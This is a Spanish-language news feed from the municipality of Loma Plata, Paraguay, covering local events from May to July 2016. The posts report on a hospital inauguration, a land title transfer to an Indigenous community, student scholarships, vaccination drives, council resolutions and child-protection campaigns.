Los artistas de Sonido de la Tierra no se quedaron atrás y con sus canciones hasta hicieron bailar al público presente. Llegaron orquestas de diferentes puntos del país como la Orquesta de Cámara de Pedro Juan Caballero, la Orquesta Frontera de Paz compuesta por artista de la misma ciudad fronteriza paraguaya con artistas de Ponta Pora Brasil que dieron un show de gran envergadura para los amantes de la buena música.
Pero, el espectáculo siguió con la presentación de la Orquesta y Coro Ha Che Valle de San Juan Bautista Misiones que con la voz de los niños ganaron el cariño del público chaqueño.
El intendente de Loma Plata, Don Walter Stockl entregó un reconocimiento a Sonido de la Tierra en persona del Maestro Elio Fleitas, Director Académico de la misma.
Agradecimiento especial a quienes hicieron posible la realización de este evento!!

Publicado: 16.07.16

Con aporte construyen un hospital.

DSC02707

Un ejemplo a imitar es el caso de la comunidad de Pesempo’o de la parcialidad lengua que con aporte de todos los trabajadores construyen un hospital de 2 mil millones de guaraníes, con una dimensión de 900 metros cuadrados. El obrero aporta 18% de su salario para la ayuda mutual hospitalaria (AMH) y 10 % el patrón y con este recurso se cubrió el 95% de la construcción de dicho edificio. El 5% restantes fueron donaciones privadas según los datos proporcionados durante el acto.
El hospital lleva el nombre de Nueva Jerusalén.
Dicho nosocomio fue inaugurado esta mañana con presencia de autoridades, vicepresidente de la República Don Juan Afara, el gobernador de Boquerón Don Edwin Pauls y el intendente de Loma Plata Don Walter Stockl entre otros.
UN EJEMPLO A SEGUIR!!!!

Publicado: 16.07.16

Cooperativa Chortitzer entrega título de propiedad a la comunidad de Pesempo’o.

DSC02644

La Cooperativa Chortitzer entregó esta mañana la trasferencia de título de propiedad a la Comunidad indígena de Pesempo’o de la etnia Lengua. Según el presidente de la Cooperativa, Gustav Sawatzky un total de 106 hectáreas se transfiere a dicha comunidad.
Por su parte Eval Arce Líder de la Comunidad agradeció a la cooperativa por el constante apoyo que reciben de dicha asociación y pidió a las autoridades nacionales la inclusión del programa social de SENAVITAT para la comunidad de Pesempo’o.

En otro momento Sawatzky elogió a los indígenas diciendo que ellos son buenos trabajadores y no son haraganes como se les tilda, en ese sentido manifestó que existen trabajadores de muchos años de servicios en la cooperativa ya sea en el frigorífico o en la planta láctea.
Del acto participaron el intendente de Loma Plata, Don Walter Stockl, el vicepresidente de la República Don Juan Afara, el gobernador de Boquerón Don Edwin Pauls y otras autoridades.
Desde la Municipalidad de Loma plata Felicitamos a la Comunidad de Pesempo’o.

Publicado: 15.07.16

Intendente participó del lanzamiento de la Expo Sudamérica 2016.

1

Don Walter Stockl, intendente de Loma Plata participó ayer del lanzamiento de la Expo Sudamérica 2016. Para tal efecto vino una comitiva de Bolivia conformada por autoridades del gobierno autónomo regional del Chaco Tarijeño – Yacuiba quienes se encargaron de dar detalles sobre el evento programado desde el 9 al 14 de agosto del corriente año. El acto se realizo en la gobernación de Boquerón en la ciudad de Filadelfia.
El objetivo es promocionar y difundir el potencial agropecuario e industrial del Gran Chaco e invitar a las autoridades y empresarios de los diferentes sectores a participar de dicha feria, manifestaron los encargados el subgobernador de Tarija, Jose Quecaña y el alcalde de Yacuiba, Ramiro Vallejos.
Igualmente estuvo presente el vicepresidente de la República Don Juan Afara, el gobernador Don Edwin Pauls, los intendentes de Filadelfia Abog. Holger Bergen, Mariscal Estigarribia Don Elmer Vogt y representantes de las cooperativas del Chaco Central, entre otros.

Publicado: 15.07.16

Diccionario Nivacle tercera edición.

DSC02554

Ayer se lanzo la tercera edición del diccionario bilingüe Nivaclé – Castellano con la presencia del vicepresidente de la Republica Don Juan afara, el gobernador de Boquerón Don Edwin Pauls, los intendentes de Loma Plata Don Walter Stockl, Filadelfia Abog. Holger Bergen y de Mariscal Estigarribia Don Elmer Vogt.
El lanzamiento estuvo a cargo del equipo lingüístico del Pueblo Nivacle y el acto se realizo en el salón de la Gobernación de Boquerón.

Publicado: 15.07.16

Limpieza y recolección de basura.

DSC02529

Esta semana en la comunidad de Pesempo’o se realizó limpieza de calles y recolección de basuras. Los trabajos fueron realizados por los pobladores con el apoyo de la Municipalidad de Loma Plata.
Pesempo’o recibirá mañana sábado 16 de julio la transferencia de título de propiedad de parte de la Cooperativa Chortitzer, con la presencia del vicepresidente de la República Don Juan Afara y otras autoridades. Además está previsto la inauguración del Hospital en dicha comunidad.

Publicado: 07.07.16

Intendente participó en Conferencia dirigidos a docentes.

DSC02446

Don Walter Stockl, intendente de Loma Plata participó en la fecha en una conferencia dirigida a profesores de instituciones educativas de las Colonias Menonitas asociadas a ACOMEPA. Como tema principal del seminario es la “competencia de los medios”. En la apertura del evento habló el Presidente de la Cooperativa Chortitzer Don Gustav Sawatzky, quien manifestó que la comunicación es una herramienta muy importante en el proceso educativo de los niños y jóvenes y que en esta era de la tecnología también está el uso del internet que puede ser de gran utilidad en el aprendizaje de los mismos.
El orador principal de la conferencia es el Profesor Paul John, lector en la Universidad de Bielefeld, Alemania.
El evento arrancó esta mañana y el cierre será el día sábado 9 de julio del corriente año. Participan docentes de instituciones que están aglutinados en el Consejo Académico de la ACOMEPA.

Publicado: 07.07.16

Ministro de la SEAM Participó en Seminario Internacional en Loma Plata.

IMG_0217

El Ministro de la Secretaría de Medio Ambiente (SEAM), Ing. Forestal Rolando Gabriel de Barros Barreto Acha participó del Tercer Encuentro Regional de Intercambio de Experiencias, en la ciudad de Loma Plata, Chaco Paraguayo, dicha actividad se realizó el martes 5 y miércoles 6 de julio, en el Salón de Evento Municipal.
El objetivo principal es visitar las comunidades indígenas y colonias menonitas, así también observar las buenas prácticas en el manejo de bosques y tierras realizadas en la zona.
Las autoridades locales también participaron de dicho evento, Don Walter Stockl Intendente de Loma Plata, Don Edwin Pauls Gobernador de Boquerón y Claudelino Rodas Secretario General de la Municipalidad de Filadelfia en representación del Intendente y Javier Pacce Secretario de Medio Ambiente de la Gobernación de Boquerón.
Igualmente en esa actividad el líder de la Comunidad ayorea Ijnapui firmó contrato para provisión de artesanías a una empresa de la ciudad de Itagua. La comunidad proveerá artesanías a dicha empresa y esta a su vez se compromete en comercializarla.

Publicado:06.07.16

Invitación para el festival.

Afiche festival 1

Loma Plata el día 19 de Julio a las 20:00 horas recibe a 120 artistas de Sonidos de la Tierra quienes en compañía de artistas locales brindarán un gran Concierto Musical para el distrito!!

Les esperamos!!

Publicado: 28.06.16

Unidad de Agua y Saneamiento de Loma Plata recibe equipos informáticos.

1

Esta mañana la Unidad de Agua y Saneamiento (UAS) del Distrito de Loma Plata recibió la donación de equipos informáticos por parte de PNUD. Con esta entrega se busca dotar de equipos que puedan facilitar los trabajos de las personas designada por la intendencia en fiscalizar las obras a ser ejecutada dentro del distrito por parte de SENASA, tanto en asistencia técnico como en la parte social.
En el distrito de Loma Plata se realizaran 4 aljibes de 120 mil litros en cuatro aldeas de la comunidad de Yalve Sanga, son: Belén, Canausa, Tarso Amyep y Madian/Sitisvis.
Del acto de entrega participó el intendente de Loma Plata, Don Walter Stockl.

Publicado: 28.06.16

Mujeres realizan trabajos de manualidades.

IMG-20160628-WA0002

Las mujeres del Barrio Residencial Sur de Loma Plata realizan trabajos de manualidades utilizando las maquinas de coser donado por la Gobernación de Boquerón con el apoyo de la Municipalidad de Loma Plata. La Sra. Esther de Stockl acompaña a las mujeres en la tarea de capacitación de corte y confección.
Actualmente las mujeres trabajan en casa particular y esperan que muy pronto que puedan tener un espacio físico para la realización de los trabajos; lo cual es apoyado por este Municipio.

Publicado: 28.06.16

Intendente participó en sesión ordinaria de la Junta Municipal.

1

Tal como lo establece la Ley Orgánica Municipal Don Walter Stockl, intendente de Loma Plata participó de la sesión ordinaria de la Junta Municipal, con voz pero sin voto, realizada en fecha 27 de junio del año en curso. En esta ocasión el pleno de la Junta estudió y aprobó el pedido de ampliación y reprogramación del presupuesto de ingresos y gastos programado para el ejercicio fiscal 2016 de la Municipalidad de Loma Plata.
Además el cuerpo legislativo aprovechó la presencia del intendente para realizar algunas consultas que fueron contestados por el ejecutivo municipal.

 Publicado: 23.06.16 

Desvío de Transganado.

DSC02032

La Municipalidad de Loma Plata comunica a la ciudadanía del Distrito de Loma Plata que desde la fecha queda prohibido la circulación de vehículos especiales – transganado en la Avenida Central; debiendo los mismos retomar los caminos alternativos para llegar a su lugar de destino.
Este pedido obedece a la necesidad de desviar los vehículos especiales – transganados de la Avenida Central establecida por Resolución Nº 558/2016 de fecha 21 de Junio del año en curso.
Se solicita a los conductores respetar la reglamentación para resguardar la seguridad de las personas que circulan por la Avenida Central y el tránsito vehicular en la zona.
Se agradece la comprensión de todos.

Publicado: 21.06.16

Municipalidad de Loma Plata entrega apoyo económico a Jóvenes estudiantes del distrito.

1

La administración de la Municipalidad de Loma Plata empezó con los pagos de apoyo económicos a estudiantes del Distrito de Loma Plata. El primer pago lo realizo el propio intendente, Don Walter Stockl quien conversó con los estudiantes beneficiados o  familiares que se acercaron para retirar dicho apoyo, así también agradeció por la paciencia en esperar que salga la nómina; ya que se tuvo que actualizar primeramente la Ordenanza que reglamenta la adjudicación de becas y otros percances.

En otro momento Don Walter Stockl manifestó que estos fondos son del ingreso genuino de la Municipalidad gracias al aporte de la ciudadanía en concepto de pago de su impuesto.

Por ello pide a los jóvenes que aprovechen al máximo esta ayuda para su formación profesional y que en el día de mañana sean profesionales al servicio del Distrito.

En total son 26 jóvenes beneficiados y el monto total adjudicado Gs. 89.600.000. La administración municipal desembolsa Gs. 33.600.000 en este primer pago correspondiente a los meses de marzo, abril y mayo.

Publicado: 20.06.16

Proyecto Heredero de la Libertad visito instituciones educativas de Loma Plata.

IMG-20160620-WA0007

La Secretaría Nacional de la Juventud,  a través de su técnico, Luis Bareiro realizó la presentación del Proyecto “Herederos de la Libertad» en el Municipio de Loma Plata. Este proyecto trata de un modelo integral de abordaje en el fortalecimiento de la participación estudiantil, a través de la conformación de Centros de Estudiantes.  Busca que los alumnos puedan adquirir aprendizajes de tipo vivencial, en la construcción del pensamiento crítico y el ejercicio pleno de ciudadanía. En este sentido se visitó las Instituciones Educativas del Colegio Héroes del Chaco, Colegio Primeros Colonos del Chaco y el Colegio San Miguel para realizar la presentación oficial del mencionado proyecto.

Publicado: 20.06.16

Aviso importante:

Lista de alumnos

Para los beneficiados del apoyo económico en concepto de becas del Distrito de Loma Plata que se presente a partir de esta tarde, lunes 20 de junio para percibir dicha ayuda. Los Beneficiados deberán traer una copia de cedula y copias de 3 facturas de los meses de marzo, abril y mayo. El pago se realizara en horario de oficina de 07:00 a 11:30  y de 13:30 a 17:30 horas en la Dirección Administrativa de la Municipalidad de Loma Plata.

Anexo la lista de beneficiados/as

 

Publicado: 20.06.16

Intendente se reunió con pobladores del barrio Primer Intendente.

1

Ayer domingo 19 de junio del corriente el intendente de Loma Plata, Don Walter Stockl mantuvo reunión con pobladores del Barrio Primer Intendente de la zona de Boquerón.

En dicha reunión asistieron en su mayoría mujeres y algunos jóvenes quienes presentaron al jefe municipal sus inquietudes y proyectos comunitarios que quieren impulsar en dicho barrio.

En representación de las mujeres hablo la Sra. Mercedes Coronel quien manifestó: Nosotras las mujeres queremos tener una ganancia extra para ayudar en la casa para la compra de las necesidades básicas, por eso proponemos la creación de huertas y criadero de pollos.

Por su parte Luz Marina Salgueiro representante de los jóvenes realizo dos pedidos,  oportunidad para seguir estudiando y espacio de recreación sana.

Por su parte el Intendente, Don Walter Stockl , primeramente agradeció por la invitación para la reunión y explicó que dichos pedidos de proyectos serán estudiados y ver el mecanismo de apoyo que pueda realizar la municipalidad.

En otro momento pidió a los beneficiados de las casas de SENAVITAT ponerse al día en sus documentación para que el gobierno pueda realizar la entrega y de esta forma tener los papeles en forma y legal. Además si cada familia cuenta con los documentos en regla es más fácil recibir ayuda desde las instituciones públicas.

41 casas fueron construidas por la SENAVITAT en dicho barrio.

Publicado: 18.06.16

Se inauguró Expo Isla Poi.

DSC01969

Esta mañana se realizo la inauguración oficial de la trigésima segunda edición de la Expo Rodeo Isla Poi con presencia de autoridades nacionales, departamental y municipal. Según los organizadores este año se duplicó la cantidad de animales expuesto en el rodeo. Asi también se realizó una inversión importante en infraestructura para mejor comodidad de los expositores.
El intendente de Loma Plata, Don Walter Stockl participó del acto inaugural.

Publicado:17.06.16

Junta Municipal aprueba firma de convenio entre la Municipalidad de Loma Plata y COOPEMAVI.

1

La Junta Municipal de Loma Plata a través de la Resolución Nº 57/2016 resuelve:

Aprobar el Convenio Marco de Cooperación Interinstitucional suscripto entre el ejecutivo de la Municipalidad de Loma Plata don Walter Stockl y la Cooperativa Multiactiva de Producción, Comercialización, Ahorro, Crédito, Consumo y Servicios “COOPEMAVI” LIMITADA, representado por su presidente Prof. Jorge Arriola.

Dicha resolución tiene fecha de 3 de junio del corriente año y la lleva la firma del Presidente de la Junta Municipal, Don Alex Thiessen y del Secretario Lic. Ramón Javier Villa.

A través de esta firma de convenio la Municipalidad de Loma Plata busca desarrollar actividades conjuntas con la ejecución de proyectos para el desarrollo del Distrito potenciando los servicios que pueda ofrecer el municipio.

Publicado:16.06.16

Trabajos de reparación de caminos vecinales y acarreo de agua.

DSC01832

Esta semana el tractor con perfiladora de la Municipalidad de Loma Plata realiza trabajo de reparación y mantenimiento de caminos vecinales en las comunidades de la Abundancia,  Villa San Miguel y Villa Boquerón.

En la primera comunidad el trabajo consistió en levantamiento del camino con cuneatada mientras en Villa San Miguel y Villa Boquerón perfilada. Así mismo se aprovecha la gran cantidad de agua acumulada en la banquina para regar los caminos después de la perfilada para opacar la gran cantidad de polvo y de esta manera prevenir accidentes que puedan ocasionar a los transeúntes por la poca visibilidad a causa del polvo.

Acarreo de agua.

Otra actividad que realiza la institución municipal es el acarreo de agua en aljibes comunitarios. En ese sentidos los primeros pedidos lo realizaron los lideres de Jope y Cana de Yalve Sanga. A pesar de las grandes precipitaciones actualmente los aljibes ya están vacios.

La cisterna de la Municipalidad deposita el agua en aljibes que están en el predio de instituciones educativas, puesto de salud, iglesias y reservorios que son utilizados de forma comunitaria.

 Publicado: 15.06.16

Reconocimiento a la Municipalidad de Loma Plata por el apoyo a la corre caminata edición 2016.

1

Esta tarde el Sr. Wilfried Urau Presidente del Comité Organizador de la corre caminata edición 2016 en Homenaje por los 89 años de Loma Plata entregó un reconocimiento de agradecimiento al intendente de dicha ciudad, Don Walter Stockl por el apoyo de la institución a su cargo.
La actividad deportiva se realizó el 4 de junio del corriente año donde participaron 498 atletas de diferentes edades y culmino con gran éxito.

Publicado: 13.06.16

Habilitan curso de corte y confección en Yalve Sanga.

2

En la fecha arrancó el curso de corte y confección de la comunidad de Yalve Sanga de la etnia Enxet. El curso es totalmente gratuito incluido los materiales, además de almuerzo y merienda para los participantes. El costo es solventado por SINAFOCAL con el apoyo de la Municipalidad de Loma Plata. El curso durara hasta el 28 de junio del corriente año y cuenta con 31 personas inscriptas.
El Intendente de Loma Plata, Don Walter Stockl participó del acto de apertura del curso.
Otro curso que arrancará a partir de hoy en el Colegio Héroes del Chaco de Loma Plata es el curso de Cajero Comercial, en horario nocturno de 19 a 21 horas.

Publicado: 12.06.16

Desfile por los 81 años de la firma de Paz del Chaco.

DSC01541

 Don Walter Stockl intendente de Loma Plata Participó del desfile estudiantil organizada por la Municipalidad de Filadelfia. Del desfile participaron más de 25 instituciones educativas del distrito que lleva por lema este año “Pactemos Paz, construyamos convivencia”.
Publicado: 10.06.16
Intendente de Loma Plata participo de desfile por la Paz del Chaco.
DSC01367

 Don Walter Stockl Intendente de Loma Plata participó esta mañana del desfile en conmemoración por la Paz del Chaco. El Desfile se realizó en el predio militar de la ciudad de Mariscal Estigarribia y contó con la participación de 18 instituciones educativas del distrito.

Participaron del evento el Gobernador de Boquerón Don Edwin Pauls, el Diputado Nacional Don Cornelius Sawatzky, el Intendente local Don Elmer Vogt y de Filadelfia Abog. Holger Bergen.

Publicado: 06.06.16

Comisiones de mujeres reciben maquinas de coser y cocina.

1

Diferentes comisiones de mujeres del Distrito de Loma Plata recibieron maquinas de coser por parte de la Secretaría de Mujer de la Gobernación de Boquerón. Los proyectos fueron canalizados a través de la encargada de Mujer de la Municipalidad de Loma Plata.

Las comisiones realizan trabajos de  manualidades  (costura en tela o crochet), mientras otras se capacitan en el área de cocina y confitería. A través de estos aportes se busca generar un ingreso económico para las madres que forman parte de las comisiones.

Las comisiones  de mujeres beneficiadas de la entrega son:  Tarso Anyip y Caná de Yalve Sanga (cocina y maquinas de coser), Villa Urundey, Barrio Residencial Sur y Pesempoo estas ultima tres comisiones recibieron maquinas de coser.

El intendente de Loma Plata, Don Walter Stockl acompañó la entrega de las maquinas y agradeció a la Secretaria de la Mujer de la Gobernación Sra. Sonia Samudio por el aporte.

Dicha entrega se realizó el viernes último.

 

Publicado: 04.06.16

Corre caminata por los 89 aniversarios de Loma Plata.

DSC01117

En la fecha se realizo la corre caminata por los 89 aniversarios de Loma Plata, en el evento participaron 498 atletas de diferentes edades. Los organizadores manifestaron su satisfacción por el éxito de la actividad.
Desde la Municipalidad se apoyó para dicho evento, además el propio Intendente de Loma Plata, Don Walter Stockl participo del evento e hizo la entrega de los premios a los ganadores.
Igualmente el Presidente de la Junta Municipal Sr. Alex Thiessen participó de la corre caminata como atleta y el Vicepresidente Sr Erico Dacosta como organizador del evento.
En otro momento los organizadores agradecieron a las instituciones y empresas que apoyan eventos de esta naturaleza que busca la práctica del deporte.

Publicado: 02.06.16

Derogación de los Artículos 6,7,8 y 9 y modificación del Articulo 10 de la Ordenanza Nº 20/2007

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/Derogacion-y-nueva-reglamentacion-de-la-ordenanza-20.2007.pdf»]

 Publicado: 02.06.16

Derogación y nueva reglamentación de la Ordenanza 05/2009 en su art. 9.

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/Derogacion-y-nueva-reglamentacion-de-la-ordenanza-20.091.pdf»]

Publicado: 31.05.16

Plan de Desarrollo de Loma Plata es admitido por la Secretaría Técnica de Planificación.

31.05.16 Certificado0004

En la fecha la Municipalidad de Loma Plata recibió el certificado que la Institución Municipal presentó en forma y tiempo, cumpliendo con los requisitos de presentación  del Plan de Desarrollo Municipal Sustentable del Distrito de Loma Plata, establecido en  el Art. 327 del Decreto Nº 477/16.  Dicho documento de aprobación expide la Secretaria Técnica de Planificación de la Presidencia de la República

Publicado: 31.05.16

Marcha contra el abuso y explotación sexual infantil.

1

Esta mañana se realizó la Marcha en el marco de la Campaña de Sensibilización CONTRA EL ABUSO Y EXPLOTACIÓN SEXUAL INFANTIL. “RESPETA MIS DERECHOS”, DENUNCIEMOS LA VIOLENCIA SEXUAL, organizada por la Municipalidad de Loma Plata a través de la CONSEJERÍA MUNICIPAL POR LOS DERECHOS DEL NIÑO, NIÑA Y ADOLESCENTE, (CODENI).

En dicho evento participó el Intendente Municipal, Don Walter Stockl quien durante su alocución pidió a la ciudadanía denunciar los hechos de violencia sexual infantil y respetar los derechos de los niños/as y adolescentes.

Estudiantes de diferentes instituciones educativas, el Presidente de la Junta Municipal, Juez de Faltas Municipales, miembros de la prensa y funcionarios de la Municipalidad de Loma Plata formaron parte de la marcha que arrancó desde el centro de la ciudad y tuvo su punto final en el local de la Municipalidad.

 Publicado: 30.05.16

Vacunación casa por casa.

IMG-20160530-WA0005

Funcionarios del Puesto Salud y estudiantes de enfermería de Loma Plata con el apoyo del Consejo de Local de Salud realizaron el viernes último  vacunación casa por casa. El trabajo arrojo un resultado de 78 personas vacunadas entre niños y ancianos. El objetivo es llegar a las personas que no pueden acercarse hasta el puesto para la aplicación de la vacuna principalmente contra la influenza.

Este trabajo de campo se realiza en el marco del Programa del Ministerio de Salud Pública y Bienestar Social, implementado en el Puesto de Salud de Loma Plata que busca tener mejor resultado principalmente en la prevención de enfermedades.

Otras vacunas que están disponible para la ciudadanía son contra el tétano, hepatitis A y fiebre amarilla.

El Puesto de Salud abre sus puertas a partir de las 07:00 horas hasta las 15:00 horas de lunes a viernes y cuenta con 1 doctor, 1 obstetra, 2 Lic. en enfermería para atención a la ciudadanía.

Publicado: 30.05.16

Marcha CONTRA EL ABUSO Y EXPLOTACION SEXUAL.

1

LA MUNICIPALIDAD DE LOMA PLATA A TRAVÉS DE LA CONSEJERIA MUNICIPAL POR LOS DERECHOS DEL NIÑO, NIÑA Y ADOLESCENTE, (CODENI) invita a la ciudadanía en general del Distrito de Loma Plata A ser partícipes de la Marcha en el marco de la Campaña de Sensibilización CONTRA EL ABUSO Y EXPLOTACION SEXUAL. “RESPETA MIS DERECHOS”, DENUNCIEMOS LA VIOLENCIA SEXUAL.

El evento se llevara a cabo el día martes 31 de mayo a partir de las 08:00 hs, marcando el lugar de salida para la caminata en la intercepción Paz del Chaco y Avenida Central frente al Banco Continental de la ciudad de Loma Plata.

Se espera contar con la presencia de todos y de esta forma marcar presencia que Loma Plata desea tener una ciudad libre de abusos y explotación infantil y se une al reclamo de todo un país de denunciar los casos de violación sexual.

 

Publicado: 27.05.16

“PLAN DE DESARROLLO SUSTENTABLE DEL DISTRITO DE LOMA PLATA” aprobado por la Junta Municipal.

10002

La junta Municipal del Distrito de Loma Plata aprobó  el “Plan de Desarrollo Municipal Sustentable del Distrito de Loma Plata”. La aprobación fue comunicada al Ejecutivo Municipal a través de la Resolución Nº 51/2016.

El documento fue aprobado por unanimidad de votos de los concejales presentes de la sesión extraordinaria de fecha 25 de mayo de 2016.

El documento será remitido a la Secretaría Técnica de Planificación tras su aprobación por la Junta Municipal. Para la elaboración del Plan estuvieron involucradas representantes de la Municipalidad, la Junta Municipal, la Coop. Chortitzer, las comisiones vecinales, comunidades indígenas y del Consejo Local de Salud que trabajaron aproximadamente durante 2 meses a través del consejo de Desarrollo conformado para tal fin.

De esta forma la Municipalidad de Loma Plata cumple en tiempo y forma lo que establece el decreto Nº 4774/16 por la cual se reglamenta la ley Nº 5554 que Aprueba el Presupuesto General de la Nación para el ejercicio Fiscal 2016, en la obligatoriedad de la presentación del Plan, quedando la implementación y ejecución del mismo durante un periodo de 10 años.

 

 Publicado:26.05.16

Consejo local de Salud de Loma Plata recibe desembolso del Ministerio de Salud Pública y Bienestar Social.

2

Es el primer desembolso que recibe el Consejo Local de Salud de Loma Plata desde su reactivación bajo esta administración municipal. La transferencia es de 23.500.000 guaraníes que ayudara para cubrir los gastos que acarrea los centros asistenciales del Distrito de Loma Plata. La transferencia  proviene del Fondo de Equidad de la cartera de salud.

El 50 % de esos recursos recibido serán utilizados para pago de personal de blanco y administrativo que hasta la fecha es pagada por la Municipalidad de Loma Plata. El otro 50 % para compra de equipos, insumos y otras necesidades básicas de los puestos. El Consejo local de Salud tiene a su cargo el Puesto de Salud de Loma Plata y apoya también a la Unidad de Salud Familiar de Villa Boquerón  y Puesto de Salud de San Miguel.

 

Publicado:26.05.16

CAMPAÑA DE CAPACITACIÓN POR LOS DERECHOS DE LOS NIÑOS, NIÑAS Y ADOLESCENTES.

DSC00703

 

El Consejo Municipal de la Niñez y Adolescente ha iniciado una serie de campaña de capacitación en instituciones educativas del Distrito. En fecha 20 de mayo se realizó en la Escuela y Colegio Héroes del Chaco, turno mañana y tarde con grupos del 1° y 2° ciclo así como también del 3° ciclo y Nivel Medio.

El objetivo es dar a conocer a los niños, niñas y adolescentes cuáles son sus derechos y obligaciones, la importancia de la Familia y las funciones tanto del Consejo, la CODENI, Juzgado de Paz, Policía Municipal de Tránsito y Policía Nacional quienes están para velar por el cumplimiento de estos derechos y obligaciones conjuntamente con el apoyo de los padres de familia, docentes y directivos.

La campaña estuvo encabezada por el Intendente Municipal Don Walter Stockl, quien preside el Consejo. La Charla fue desarrollada por cada uno de los miembros del Consejo integrado por representante de los diversos grupos sociales que trabajan en esta área.

Se prevé llevar a cabo estas capacitaciones una vez al mes visitando las diversas instituciones educativas del distrito.

Publicado: 25.05.16

Departamento de Juventud de la Municipalidad de Loma Plata recibe equipo informático.

DSC00896

El Departamento de Juventud de la Municipalidad de Loma Plata recibió equipos informáticos consistente en una notebook, 1 impresora, 1 proyector, parlante de audio y kits de útiles para la oficina. La entrega se realiza en el marco del Proyecto Red Departamental de Departamentos Municipales de Juventud financiado por la Secretaría Nacional de Juventud. La entrega lo realizó el propio Ministro Secretario Ejecutivo, Abog. Marcelo Javier Soto Pavón.

En el acto participó el Intendente de la Municipalidad de Loma Plata, Don Walter Stockl y el encargado del Departamento de Juventud Baudelio Martínez.

Además los intendentes Filadelfia Abog. Holger Bergen y de Mariscal Estigarribia Sr. Elmer Vogt.

 

Publicado: 12.05.16

Municipalidad  de Loma Plata firma convenios con la Secretaría de Acción Social.

DSC00636

La Municipalidad de Loma Plata firmó  convenios con la Secretaría de Acción Social, para establecer mecanismo de cooperación y complementariedad interinstitucional, que faciliten la implementación de los Programas TEKOPORA y TENONDERA en el distrito.

Entre los compromisos de ambas instituciones firmantes de los documentos se establecen:

La SAS es la institución encargada de Coordinar los procesos de focalización y selección de titulares de derechos de los Programas. Además de realizar la supervisión de los procesos de verificación de corresponsabilidades como también ordenar las transferencias monetarias para los hogares beneficiarios del Programa de Tekoporã en los casos que corresponda.

Realizar capacitaciones, promociones, seguimientos y evaluación a los programas. Además de Administrar, supervisar, controlar, ejecutar los Proyectos de  Tekoporã y Tenondera.

Por su parte la Municipalidad de Loma Plata apoyará los procesos de     capacitación y empadronamiento masivo e inscripción de los hogares de inscripción. Así mismo asignará a un funcionario que será un enlace entre ambas instituciones para los programas de Tekopora y Tenondera.

El documento fue firmado por parte de la Municipalidad de Loma plata el Intendente Don Walter Stockl y por la Secretaría de Acción Social el Ministro Secretario Lic. Héctor Cárdenas. También lo firmo el intendente de Mariscal Estigarribia Sr. Elmer Vogt.

Tanto el Gobernador de Boquerón Don Edwin Pauls y los intendentes de Loma Plata, Don Walter Stockl; Filadelfia Abog. Holger Bergen y Mariscal Estigarribia Elmer Vogt manifestaron su agradecimiento al Ministro de la SAS y además pidieron  a los beneficiados a utilizar adecuadamente el aporte económico que reciben del programa Tekopora. Tanto en el Municipio de Filadelfia y Mariscal Estigarribia ya existen familias beneficiadas, y en Loma Plata estarían empezando los trabajos censales en junio.

 

 

Publicado: 10.05.16

Vacunas contra influenza, en Loma Plata.

IMG-20160510-WA0002

Ayer  el Ministerio de Salud entrego las vacunas contra  influenza  al Consejo de Salud Local del Distrito de Loma Plata para el Puesto de Salud de dicha ciudad y la Unidad de Salud Familiar de Villa Boquerón.

A partir de hoy las vacunas están disponibles en los puestos mencionados más arriba para la población del distrito, en forma gratuita. Autoridades del  Consejo Local  de Loma Plata instan a acudir a los vacunatorios para recibir la dosis contra la influenza.

 

Publicado: 09.05.16

Festejo con alabanza por el día de la Madre.

DSC00563

El sábado último se realizó el festejo por el Día de la Madre, dicho evento fue organizado por la Capellanía de la Cooperativa Chortitzer y la Municipalidad de Loma Plata con el apoyo de la Comisión Vecinal Barrio Residencial Sur.

Hubo momento artístico, danzas paraguaya, grupos musicales y momento de alabanza al Dios Celestial con el Pastor Ederson Hein de la Consejería de Radio zp30.

En el festejo participó el intendente Don Walter Stockl, acompañado por su esposa  Sra. Esther  Friesen De Stockl.

Los niños también tuvieron su espacio de diversión.

 

Publicado:06.05.16

Lanzan campaña contra el abuso y explotación  sexual.

DSC00537

La campaña se lanzó durante la reunión del consejo Municipal  de la Niñez y Adolescencia en donde participaron el intendente, Don Walter Stockl actual presidente del Consejo, el Pdte. de la Honorable Junta, Sr. Alex Thiessen , Erico Dacosta Concejal y los miembros del  Consejo conformados por representantes de diferentes instituciones públicas y sectores privado. Este año 2016 la iniciativa lleva el slogan ‘RESPETA MIS DERECHOS, DENUNCIA LA VIOLENCIA SEXUAL’.

La campaña consiste en concienciar a la población e incentivar a luchar contra este flagelo que  aqueja a nuestra sociedad. En ese sentido el intendente Don Walter Stockl manifestó su repudio hacia delitos de esa naturaleza y acotó que se siente impotente como padre de familia y autoridad, repudiando  todo acto de abuso y explotación. Además animó a los integrantes del consejo a trabajar unidos por los derechos de los más pequeños.

A su vez el Presidente de la Junta Sr. Alex Thiessen que desde el cuerpo legislativo apoyara esta iniciativa.

La Consejería Municipal de la Niñez (CODENI) a cargo de la Sra. Dora Bradshaw viene organizando actividades con la Secretaría de Niñez Departamental visitando instituciones  educativas públicas y privadas o entidades como bancos, comercios y otros.

Además durante este mes se repartirá volantes y  afiches referentes a la niñez, así también se entregara un lazo  simbólico de color verde.

Otra actividad importante que se tiene previsto el martes 31 de  mayo  un encuentro de las tres CODENIS  del Departamento de Boquerón, donde se realizara una caminata  en la avenida principal de la ciudad de Loma Plata. Para tal efecto extendemos la invitación a la ciudadanía en general a participar de dicha actividad acompañado de los niños/as y adolescentes.

 

Publicado: 06.05.16

Autoridades de Loma Plata y Filadelfia firman convenio.

DSC00523

Esta mañana los intendentes de Loma Plata, representado por Don Walter Stockl y Filadelfia, por el Abog. Holger Bergen firmaron un Convenio de Cooperación Interinstitucional en el documento reza que ambas instituciones se comprometen a compartir el servicio profesional de Juez de Faltas en aras de lograr un mejor aprovechamiento de los recursos disponibles.

A partir de esta firma y homologación del presente convenio, el Abogado Cesar Cardozo, pasará también a desempeñar el cargo de Juez de Faltas de la ciudad de Loma Plata en carácter de AD HONOREM. Actualmente el profesional del derecho se desempeña como Juez de Faltas de la  Municipalidad de Filadelfia.

De esta forma el abogado realizara su trabajo profesional en la Municipalidad de Loma Plata y Filadelfia.

El Presidente de la Honorable Junta Municipal, Sr. Alex Thiessen,  también participó de la firma del documento. Igualmente el Abogado Cesar Cardozo firmo el convenio a modo de conformidad del escrito.

Publicado: 02.05.16

Aviso importante:

pago_impuestos_sunat_2014

